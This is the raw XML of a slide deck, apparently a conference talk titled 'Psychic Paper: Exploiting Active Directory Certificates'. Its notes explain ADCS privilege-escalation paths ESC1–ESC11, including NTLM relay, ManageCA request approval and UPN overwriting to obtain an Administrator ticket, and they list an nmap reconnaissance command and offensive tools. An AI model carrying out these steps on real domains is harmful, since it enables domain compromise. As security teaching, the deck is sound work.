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Montserrat"/>
      <p:regular r:id="rId60"/>
      <p:bold r:id="rId61"/>
      <p:italic r:id="rId62"/>
      <p:boldItalic r:id="rId63"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="La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8" roundtripDataSignature="AMtx7mj8VEu6o0Q7KCCuugVJuwbEGVrp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italic.fntdata"/><Relationship Id="rId61" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-bold.fntdata"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide15.xml"/><Relationship Id="rId64" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-regular.fntdata"/><Relationship Id="rId63" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserrat-boldItalic.fntdata"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide17.xml"/><Relationship Id="rId66" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-italic.fntdata"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide16.xml"/><Relationship Id="rId65" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Lato-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Lato-boldItalic.fntdata"/><Relationship Id="rId60" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/Montserra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resecurity.com/core-labs/articles/reading-dpapi-encrypted-keys-mimikatz" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/derrickorama/7b08298b657048660293"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highlight>
                  <a:srgbClr val="F5F5F5"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>nmap -p 443 --script http-ntlm-info --script-args http-ntlm-info.root=/certsrv/ &lt;target&gt;</a:t>
            </a:r>
            <a:endParaRPr>
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F5F5F5"/>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certqma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Key things to look for in CA’s are ESC6-8 and ESC11</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>These are vulnerabilities specific to the Certificate Authority.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ESC8 Means you can use responder to relay any requests into obtaining a certificate for the user, this functionality has been included in Certipy.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Orange - Name of the template, for requests.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Green - Enrollment server, who you can request this cert from (can be multiple in larger orgs, not all certs can come from the same CA)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Dark Blue - Vulnerabilities (ESC1-4 for Certi, Certify goes to ESC6, Certipy now identifiers ESC1-10)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Teal - What can this key be used for - Easiest to exploit is Smart Key authentication, Client authentication means you’ll have to use it for SCHANNEL (LDAP exploit)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Yellow - Who can enroll in this certificate, If you’re requesting a cert like this, you need to have permissions to enroll AND the target needs to have permissions as well.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Purple - This is a special case, for ESC5? (validate) Occasionally you may have permissions not to enroll in a certificate, but you can with your credentials modify the permissions. Any permission here will let you set yourself as the owner (full control), Overwrite the control list, escalating your permissions, or Write properties of the certificate, allowing you to modify its usecase and who can be enrolled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a user can enroll in a service and specify an subjectAltName they can request a certificate for any other user.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is going to change when Microsoft enforces requesting SID on May 9 2023 and StrongeCertificateBinding November 14, 2023?</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300"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>5 Template Vulnerabilities, ESC1-5 and 6 Authority Vulnerabilities, ESC6-11</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a user can enroll in a service and specify an subjectAltName they can request a certificate for any other user. - May 9 2022 Update requires the requesting SID, this is meant to be fetched from the AD via certipy but I have not yet confirmed this in the field.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ESC2 is a specific case, but most exploitation will be the same as the ESC3. There are additional capabilities you can do with this, but will require you to think on your feet and be specific to other components in the network (e.g., code signing, server authentication, etc.) and might have large implications for other applications in the network like SAML, AD FS, or IPSec.</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Crucially, you can use ESC2 certificates to sign Schema Version 1 Certificates, which include ALL default certificates (User, Computer, DOMAIN CONTROLLER!)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Some certificates require another certificate to enroll them, enter the Certificate Request Agent Key Usage.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>If you can identify this key on a certificate, you can generate a completely valid certificate for any other user and approve the request using this certificate,.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a certificate can be enrolled by this user and required signing, it can be done with the certificate we previously acquired.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makes it vulnerable to ESC1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Further explanation of this is covered in https://github.com/cfalta/PoshADCS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a30ba645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1a30ba645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hell for Blue teams as forged certificates cannot be revoked.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configuration just means we can perform the ESC1 attack against any certificate template no matter what they have configured underneath.</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order to exploit, we need to have access to Manage Certificates and/OR ManageCA, with Manage Certificates we can approve any request, and with ManageCA we can give our account permissions to Manage Certificates.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>So 1 Add yourself as an officer using certipy, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Additionally if you need to enable the certificate use command A to the certificate you’re targeting. </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>2 Request a certificate that will fail, we use SubCA in this case because it is a typically default certificate with high powers, make sure to note the Request ID in the output as you’ll use it later.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>3 approve the request with your acquired permissions</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4. Retrieve the approved certificate. And continue with your attacks.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Certipy comes with an NTLM relay that uses the impacket implementation of ntlmrelayx, standing up it’s own server. It’s up to you how to pull a request in, via responder, petitpotam or otherwise. Certipy also does a manual request for the User or Machine certificate depending on who sends the request.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Additional versions include ExAndroidDev who built the version I believe was eventually pulled into impacket, and ADCSPwn from bats3c which is a windows based version.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Add a shadow credential to an account, or obtain the NTLM HASH for the account that you have generic write over.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Update the UPN to Administrator (Notably this isn’t a violation since the default admin is Administrator@domain)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Request the vulnerable certificate, change the account back to its standard UPN.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Run the auth command, specifying the domain value so that the KDC adds it and provides you with the TGT for the administrator account.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identify Case1, you can perform the same exploit outlined in ESC9, but on any template.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Similarly to before we overwrite the UPN to match a system that either does not have a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F2F2"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>userPrincipalName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, or has a UPN that doesn’t match their </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1150">
                <a:solidFill>
                  <a:srgbClr val="292929"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="F2F2F2"/>
                </a:highlight>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>sAMAccountName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>, then we request a certificate, change the UPN back and we can then authenticate over an LDAP shell.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PKINIT is not enabled but your certificate allows client authentication you can authenticate over SCHANNEL to LDAP/S. Ceripty now has this feature, whereas PasstheCert and BloodyAd have some automatic/additional features for leverage.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1a30ba645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1a30ba645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1a30ba645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1a30ba64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1a30ba64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1a30ba64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1a30ba64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1a30ba64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1a30ba64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1a30ba64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1a30ba64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1a30ba64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1a30ba645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1a30ba64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1a30ba645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1a30ba645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a30ba645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a30ba645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1b587062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1b587062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https://www.coresecurity.com/core-labs/articles/reading-dpapi-encrypted-keys-mimikatz</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://gist.github.com/derrickorama/7b08298b657048660293</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6"/>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6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="490"/>
            <a:ext cx="5153705" cy="5134399"/>
            <a:chOff x="0" y="75"/>
            <a:chExt cx="5153705" cy="5152950"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="12" name="Google Shape;12;p4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4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4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55"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4406400" y="0"/>
            <a:ext cx="4737600" cy="5143065"/>
            <a:chOff x="4406400" y="0"/>
            <a:chExt cx="4737600" cy="5143065"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="107" name="Google Shape;107;p5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5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5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47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="381001"/>
            <a:ext cx="1037850" cy="1016288"/>
            <a:chOff x="0" y="381001"/>
            <a:chExt cx="1037850" cy="1016288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Google Shape;21;p4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4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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="27" name="Google Shape;27;p48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="381001"/>
            <a:ext cx="1037850" cy="1016288"/>
            <a:chOff x="0" y="381001"/>
            <a:chExt cx="1037850" cy="1016288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Google Shape;28;p4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4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4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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="35" name="Google Shape;35;p49"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4406400" y="0"/>
            <a:ext cx="4737600" cy="5143065"/>
            <a:chOff x="4406400" y="0"/>
            <a:chExt cx="4737600" cy="5143065"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Google Shape;36;p4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50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="381001"/>
            <a:ext cx="1037850" cy="1016288"/>
            <a:chOff x="0" y="381001"/>
            <a:chExt cx="1037850" cy="1016288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58" name="Google Shape;58;p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5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51"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="381001"/>
            <a:ext cx="1037850" cy="1016288"/>
            <a:chOff x="0" y="381001"/>
            <a:chExt cx="1037850" cy="1016288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="Google Shape;64;p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5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5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52"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4406400" y="0"/>
            <a:ext cx="4737600" cy="5143500"/>
            <a:chOff x="4406400" y="0"/>
            <a:chExt cx="4737600" cy="5143500"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="Google Shape;71;p52"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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2"/>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52"/>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53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="381001"/>
            <a:ext cx="1037850" cy="1016288"/>
            <a:chOff x="0" y="381001"/>
            <a:chExt cx="1037850" cy="1016288"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="93" name="Google Shape;93;p5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3"/>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53"/>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53"/>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54"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="4128572"/>
            <a:ext cx="698925" cy="684657"/>
            <a:chOff x="0" y="3785672"/>
            <a:chExt cx="698925" cy="684657"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="101" name="Google Shape;101;p5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5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GhostPack/Certify" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/zer1t0/certi" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/Certi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ithub.com/ExAndroidDev/impacket/tree/ntlmrelayx-adcs-attack"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github.com/AlmondOffSec/PassTheCert/pull/4" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/UriskLyErg/PassTheCert/tree/add_whoami" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CravateRouge/bloodyAD" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/CravateRouge/autobloody" TargetMode="External"/><Relationship Id="rId7"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github.com/ly4k/BloodHoun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github.com/GhostPack/PSPKIAudit" TargetMode="Externa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specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/certified-pre-owned-d95910965cd2" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://luemmelsec.github.io/Skidaddle-Skideldi-I-just-pwnd-your-PKI/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.qdsecurity.se/2022/05/27/manually-injecting-a-sid-in-a-certificate/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/Orange-Cyberdefense/GOAD" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tarlogic.com/blog/ad-cs-manageca-rce/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d" TargetMode="External"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ly4k/Certipy" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7" TargetMode="External"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/cfalta/PoshADC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hyperlink" Target="https://github.com/gentilkiwi/mimikat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a:t>Psychic Paper: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000"/>
              <a:t>Active Directory Certificates</a:t>
            </a:r>
            <a:endParaRPr sz="2000"/>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n"/>
              <a:t>Caleb House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Identifying Certificate Authorities</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="194" name="Google Shape;194;p1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Identify on Windows using:</a:t>
            </a:r>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CertMgr</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Certutil -config -ping (on a windows host)</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Identify on Linux using:</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t>Querying ‘Cert Publishers’ group in AD (should be default).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1100">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>nmap -p 443 --script http-ntlm-info --script-args http-ntlm-info.root=/certsrv/ &lt;target&gt;</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Connecting to the CA</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="200" name="Google Shape;200;p1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Certificate Authority will have:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RPC interface</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ICRP RPC Interface (alternative if firewalled)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>HTTP/s interface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Handcrafted “Artisanal” Certificates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="206" name="Google Shape;206;p1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07" name="Google Shape;207;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="0" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2338025" y="1267875"/>
            <a:ext cx="4467950" cy="3431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Or use helpful Tooling</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="213" name="Google Shape;213;p1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Certify </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/GhostPack/Certify</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (Spectre Ops, the OG alongside whitepaper)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://github.com/zer1t0/certi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> (Has now been completed superseded by)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Ceritpy </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
